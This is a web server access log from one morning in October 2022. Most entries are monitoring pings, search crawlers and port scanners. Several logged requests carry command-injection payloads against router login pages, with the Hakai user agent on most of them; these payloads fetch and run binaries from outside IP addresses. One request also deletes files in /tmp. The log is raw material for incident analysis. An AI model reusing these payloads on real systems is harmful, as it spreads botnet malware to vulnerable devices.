212.91.246.72 - - [04/Oct/2022:08:07:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:08:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:09:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.51 - - [04/Oct/2022:08:10:35 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [04/Oct/2022:08:10:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:11:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:12:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.204.148.192 - - [04/Oct/2022:08:13:28 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Oct/2022:08:13:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:14:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:15:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:16:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:17:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:18:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:19:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:20:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:21:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.142.236.43 - - [04/Oct/2022:08:21:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.142.236.43 - - [04/Oct/2022:08:22:01 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
185.142.236.43 - - [04/Oct/2022:08:22:01 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
185.142.236.43 - - [04/Oct/2022:08:22:02 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
185.142.236.43 - - [04/Oct/2022:08:22:03 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
212.91.246.72 - - [04/Oct/2022:08:22:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
217.15.151.155 - - [04/Oct/2022:08:23:30 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Oct/2022:08:23:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:24:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.78.6.216 - - [04/Oct/2022:08:24:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
212.91.246.72 - - [04/Oct/2022:08:25:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:26:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:27:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:28:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:29:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:30:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.204.148.192 - - [04/Oct/2022:08:31:37 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Oct/2022:08:31:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:32:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:33:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:34:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:35:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.248.167.131 - - [04/Oct/2022:08:36:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
89.248.167.131 - - [04/Oct/2022:08:36:33 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
89.248.167.131 - - [04/Oct/2022:08:36:33 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
89.248.167.131 - - [04/Oct/2022:08:36:33 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
89.248.167.131 - - [04/Oct/2022:08:36:34 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
212.91.246.72 - - [04/Oct/2022:08:36:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.17 - - [04/Oct/2022:08:36:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Oct/2022:08:37:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:38:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.76.96.55 - - [04/Oct/2022:08:38:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
212.91.246.72 - - [04/Oct/2022:08:39:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.31 - - [04/Oct/2022:08:39:58 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
212.91.246.72 - - [04/Oct/2022:08:40:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:41:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:42:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.158.217.137 - - [04/Oct/2022:08:43:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0"
212.91.246.72 - - [04/Oct/2022:08:43:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.158.217.137 - - [04/Oct/2022:08:43:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0"
43.158.217.137 - - [04/Oct/2022:08:44:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0"
87.17.244.22 - - [04/Oct/2022:08:44:24 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
92.13.75.66 - - [04/Oct/2022:08:44:29 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
43.158.217.137 - - [04/Oct/2022:08:44:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0"
43.158.217.137 - - [04/Oct/2022:08:44:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0"
212.91.246.72 - - [04/Oct/2022:08:44:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:45:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:46:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.158.217.137 - - [04/Oct/2022:08:47:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0"
212.91.246.72 - - [04/Oct/2022:08:47:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.158.217.137 - - [04/Oct/2022:08:47:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0"
43.158.217.137 - - [04/Oct/2022:08:48:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0"
212.91.246.72 - - [04/Oct/2022:08:48:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:49:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
197.34.102.176 - - [04/Oct/2022:08:50:06 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.216.71.192/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [04/Oct/2022:08:50:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.158.217.137 - - [04/Oct/2022:08:51:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0"
43.158.217.137 - - [04/Oct/2022:08:51:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0"
212.91.246.72 - - [04/Oct/2022:08:51:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:52:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:53:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:54:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:55:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:56:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.199.26.238 - - [04/Oct/2022:08:57:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
128.199.26.238 - - [04/Oct/2022:08:57:35 +0200] "\x16\x03\x01" 501 318 "-" "-"
128.199.26.238 - - [04/Oct/2022:08:57:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Oct/2022:08:57:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:08:58:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
159.223.37.75 - - [04/Oct/2022:08:58:40 +0200] ",\xbe\xe6\x912\xfc\x9b\xe2{\xbb\xce8(\xa9W\x05&\x92\x0e\x8c\x06\xb6L\x8c\xbc:\x8d'" 501 347 "-" "-"
159.223.37.75 - - [04/Oct/2022:08:58:41 +0200] "\x16\x03\x01" 501 318 "-" "-"
159.223.37.75 - - [04/Oct/2022:08:58:41 +0200] "\x16\x03\x01" 501 318 "-" "-"
159.223.37.75 - - [04/Oct/2022:08:58:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Oct/2022:08:59:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.66.192 - - [04/Oct/2022:09:00:15 +0200] "GET /robots.txt HTTP/1.1" 404 321 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.196 - - [04/Oct/2022:09:00:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
86.143.96.54 - - [04/Oct/2022:09:00:30 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Oct/2022:09:00:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:01:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:02:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:03:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.217.60 - - [04/Oct/2022:09:04:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.217.60 - - [04/Oct/2022:09:04:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.217.60 - - [04/Oct/2022:09:04:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.217.60 - - [04/Oct/2022:09:04:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.217.60 - - [04/Oct/2022:09:04:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.217.60 - - [04/Oct/2022:09:05:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.217.60 - - [04/Oct/2022:09:06:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.217.60 - - [04/Oct/2022:09:06:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
14.241.66.81 - - [04/Oct/2022:09:06:31 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
192.241.217.60 - - [04/Oct/2022:09:06:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
172.91.47.43 - - [04/Oct/2022:09:07:41 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Oct/2022:09:07:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:08:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:09:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
188.166.112.233 - - [04/Oct/2022:09:09:55 +0200] "\x9e\xa8~" 501 318 "-" "-"
188.166.112.233 - - [04/Oct/2022:09:09:56 +0200] "\x16\x03\x01" 501 318 "-" "-"
188.166.112.233 - - [04/Oct/2022:09:09:56 +0200] "\x16\x03\x01" 501 318 "-" "-"
188.166.112.233 - - [04/Oct/2022:09:09:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
151.236.216.243 - - [04/Oct/2022:09:10:31 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
151.236.216.243 - - [04/Oct/2022:09:10:31 +0200] "GET /W3pb HTTP/1.1" 404 309 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:09:10:31 +0200] "GET /Portal0000.htm HTTP/1.1" 404 319 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:09:10:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:09:10:31 +0200] "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 1229 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:09:10:31 +0200] "GET /__Additional HTTP/1.1" 404 317 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:09:10:31 +0200] "GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 200 1229 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:09:10:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:09:10:31 +0200] "GET /default.jhtml HTTP/1.1" 404 318 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:09:10:32 +0200] "GET /nmaplowercheck1664867431 HTTP/1.1" 404 329 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:09:10:32 +0200] "HEAD / HTTP/1.1" 200 - "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:09:10:32 +0200] "GET /main.cfm HTTP/1.1" 404 313 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:09:10:32 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:09:10:32 +0200] "GET /pools/default/buckets HTTP/1.1" 404 326 "-" "curl/7.54.0" 151-236-216-243.ip.linodeusercontent.com - - [04/Oct/2022:09:10:31 +0200] "GET /server-status HTTP/1.1" 403 322 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:09:10:32 +0200] "GET /CSS/Miniweb.css HTTP/1.1" 404 320 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:09:10:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:09:10:32 +0200] "GET /pools HTTP/1.1" 404 310 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:09:10:32 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:09:10:32 +0200] "POST /scripts/WPnBr.dll HTTP/1.1" 404 322 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:09:10:32 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
151.236.216.243 - - [04/Oct/2022:09:10:32 +0200] "GET /Portal/Portal.mwsl HTTP/1.1" 404 323 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:09:10:32 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:09:10:32 +0200] "GET /docs/cplugError.html/ HTTP/1.1" 404 326 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:09:10:42 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
151.236.216.243 - - [04/Oct/2022:09:10:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Oct/2022:09:10:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
68.161.44.37 - - [04/Oct/2022:09:11:25 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Oct/2022:09:11:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:12:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.94.92.231 - - [04/Oct/2022:09:12:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
172.104.138.223 - - [04/Oct/2022:09:13:27 +0200] "GET /fuN3 HTTP/1.0" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"
212.91.246.72 - - [04/Oct/2022:09:13:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:14:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:15:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:16:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
111.118.40.97 - - [04/Oct/2022:09:16:53 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Oct/2022:09:17:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.110.62.213 - - [04/Oct/2022:09:18:27 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Oct/2022:09:18:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:19:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.94.92.231 - - [04/Oct/2022:09:20:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Oct/2022:09:20:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:21:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:22:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:23:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.94.92.231 - - [04/Oct/2022:09:24:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Oct/2022:09:24:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:25:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:26:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:27:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:28:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:29:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.94.92.231 - - [04/Oct/2022:09:30:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Oct/2022:09:30:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
